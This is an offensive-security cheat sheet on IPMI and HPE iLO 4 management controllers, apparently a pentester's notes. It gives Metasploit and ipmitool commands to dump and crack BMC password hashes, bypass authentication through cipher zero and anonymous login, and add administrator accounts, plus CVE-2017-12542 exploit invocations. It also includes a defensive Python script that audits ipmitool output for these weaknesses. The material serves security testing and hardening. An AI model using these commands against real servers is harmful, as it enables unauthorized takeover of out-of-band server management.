# IPMI

* <https://blog.rapid7.com/2013/07/02/a-penetration-testers-guide-to-ipmi/>
* <https://habr.com/ru/company/selectel/blog/439834/>

## Discovery

```
msf > use auxiliary/scanner/ipmi/ipmi_version
msf > set RHOSTS file:ipmi.txt
msf > set THREADS 25
msf > run
```

## Dump Hashes

**CVE-2013-4786**

Dump hashes:

```
msf > use auxiliary/scanner/ipmi/ipmi_dumphashes
msf > set OUTPUT_HASHCAT_FILE ipmi_hashes.txt
msf > set RHOSTS file:ipmi.txt
msf > set THREADS 25
msf > run
```

Recover plaintext passwords:

```
$ hashcat -m 7300 -O -a 0 -w 3 --session=ipmi -o ipmi.out ipmi.in seclists/Passwords/darkc0de.txt -r rules/d3ad0ne.rule --username
```

## Cipher Zero

**CVE-2013-4805**

Discover with MSF:

```
msf > use auxiliary/scanner/ipmi/ipmi_cipher_zero
msf > set RHOSTS file:ipmi.txt
msf > set THREADS 25
msf > run
```

Guess an existing admin username. If `ADMIN` is a valid username, the `user list` command succeeds regardless of the password supplied:

```
$ sudo apt install ipmitool
$ ipmitool -I lanplus -C 0 -H 127.0.0.1 -U ADMIN -P DummyPassw0rd user list
```

Add a new admin user (only an existing admin username is needed; `<ID>` is a free user slot taken from the `user list` output):

```
$ ipmitool -I lanplus -C 0 -H 127.0.0.1 -U ADMIN -P DummyPassw0rd user set name <ID> snovvcrash
$ ipmitool -I lanplus -C 0 -H 127.0.0.1 -U ADMIN -P DummyPassw0rd user set password <ID> 'Passw0rd!'
$ ipmitool -I lanplus -C 0 -H 127.0.0.1 -U ADMIN -P DummyPassw0rd user priv <ID> 4
$ ipmitool -I lanplus -C 0 -H 127.0.0.1 -U ADMIN -P DummyPassw0rd user enable <ID>
```

## Anonymous Authentication

Can be discovered with the MSF `ipmi_dumphashes` module, but also with ipmitool:

```
$ ipmitool -I lanplus -H 127.0.0.1 -U '' -P '' user list
```

Change the password of a named user account:

```
$ ipmitool -I lanplus -H 127.0.0.1 -U '' -P '' user set password <ID> 'Passw0rd!'
```
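The two sections above (Cipher Zero and Anonymous Authentication) both come down to BMC settings you can read back with ipmitool and fix with it. The script below is an added example, not code from this page or from ipmitool: it parses the output of `ipmitool lan print <channel>` and `ipmitool user list`, flags cipher suite 0 being enabled, the `NONE` auth type being enabled, and empty-named user slots that can still send IPMI messages, and derives the `cipher_privs` string that disables suite 0. The sample output is constructed to match ipmitool's layout; the assumption that the first character of `cipher_privs` corresponds to cipher suite 0 follows ipmitool's `lan set` documentation, and channel 1 is assumed in the suggested command.

```python
import re

# Constructed sample of `ipmitool -I lanplus -H <bmc> -U <user> -P <pass> lan print 1`
# output, trimmed to the fields the audit reads. Not captured from a real BMC.
SAMPLE_LAN_PRINT = """\
Auth Type Support       : NONE MD2 MD5 PASSWORD
Auth Type Enable        : Callback : MD2 MD5 PASSWORD
                        : User     : NONE MD2 MD5 PASSWORD
                        : Operator : MD2 MD5 PASSWORD
                        : Admin    : MD2 MD5 PASSWORD
                        : OEM      : MD2 MD5 PASSWORD
IP Address              : 192.0.2.10
RMCP+ Cipher Suites     : 0,1,2,3,6,7,8,11,12
Cipher Suite Priv Max   : aaaaaaaaaaaaaaa
                        :     X=Cipher Suite Unused
                        :     c=CALLBACK
                        :     u=USER
                        :     o=OPERATOR
                        :     a=ADMIN
                        :     O=OEM
"""

# Constructed sample of `ipmitool ... user list` output. Slot 1 has an empty
# name but IPMI messaging enabled at ADMINISTRATOR: the anonymous account.
SAMPLE_USER_LIST = """\
ID  Name\t     Callin  Link Auth\tIPMI Msg   Channel Priv Limit
1                    true    false      true       ADMINISTRATOR
2   ADMIN            true    false      true       ADMINISTRATOR
3   monitor          true    false      true       USER
"""


def parse_lan_print(text):
    """Extract the cipher suite list, the per-suite max-privilege string and
    any NONE auth type from `lan print` output (key/value lines plus
    ':'-continuation lines that belong to the previous key)."""
    info = {"cipher_suites": [], "cipher_privs": "", "auth_none": []}
    key = None
    for line in text.splitlines():
        m = re.match(r"^(\S.*?)\s*:\s*(.*)$", line)
        if m:
            key, value = m.group(1), m.group(2).strip()
        else:
            cont = re.match(r"^\s+:\s*(.*)$", line)
            if not cont or key is None:
                continue
            value = cont.group(1).strip()
        if key == "RMCP+ Cipher Suites":
            info["cipher_suites"] = [int(x) for x in value.split(",") if x.strip()]
        elif key == "Cipher Suite Priv Max" and not info["cipher_privs"]:
            info["cipher_privs"] = value  # first line only; the legend follows
        elif key == "Auth Type Enable":
            level, _, types = value.partition(":")
            if "NONE" in types.split():
                info["auth_none"].append(level.strip())
    return info


def audit_lan(info):
    """Findings for the settings the Cipher Zero and anonymous-auth sections rely on."""
    findings = []
    privs = info["cipher_privs"]
    if 0 in info["cipher_suites"] and privs and privs[0] != "X":
        findings.append("cipher suite 0 enabled (max priv '%s')" % privs[0])
    for level in info["auth_none"]:
        findings.append("auth type NONE enabled for %s" % level)
    return findings


def hardened_cipher_privs(privs):
    """Same-length privilege string with cipher suite 0 marked unused ('X'),
    ready for `ipmitool lan set <channel> cipher_privs <string>`."""
    return ("X" + privs[1:]) if privs else privs


# One row of `user list`: id, optional name, three true/false flags, priv level.
USER_ROW = re.compile(
    r"^(\d+)\s+(?:(\S+)\s+)?(true|false)\s+(true|false)\s+(true|false)\s+(\S+)\s*$")


def parse_user_list(text):
    users = []
    for line in text.splitlines():
        m = USER_ROW.match(line)
        if m:  # header and blank lines do not match
            uid, name, _callin, _link, ipmi_msg, priv = m.groups()
            users.append({"id": int(uid), "name": name or "",
                          "ipmi_msg": ipmi_msg == "true", "priv": priv})
    return users


def audit_users(users):
    """Flag empty-named slots that can still send IPMI messages (anonymous login)."""
    return ["user slot %d has no name but IPMI messaging enabled at %s" % (u["id"], u["priv"])
            for u in users if u["name"] == "" and u["ipmi_msg"]]


if __name__ == "__main__":
    lan = parse_lan_print(SAMPLE_LAN_PRINT)
    for f in audit_lan(lan) + audit_users(parse_user_list(SAMPLE_USER_LIST)):
        print("FINDING:", f)
    print("suggested: ipmitool lan set 1 cipher_privs", hardened_cipher_privs(lan["cipher_privs"]))
```

Run it against saved `lan print` and `user list` output from your own BMCs; an empty-named slot that is flagged is the one to disable (`ipmitool user disable <ID>`) or give a real password, and the printed `cipher_privs` string keeps every other suite's privilege level as it was while turning suite 0 off.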

## HPE iLO 4

* <https://codeby.net/threads/poluchaem-dostup-k-hp-ilo.63224/>
* <https://github.com/airbus-seclab/ilo4_toolbox>

### Add Admin User

**CVE-2017-12542**

Exploit with Python:

* <https://www.exploit-db.com/exploits/44005>

```
$ ./44005.py -t -e -u snovvcrash -p 'Passw0rd!' 127.0.0.1
```

Exploit with MSF:

```
msf > use auxiliary/admin/hp/hp_ilo_create_admin_account
msf > set RHOSTS 10.10.13.37
msf > set USERNAME snovvcrash
msf > run
```
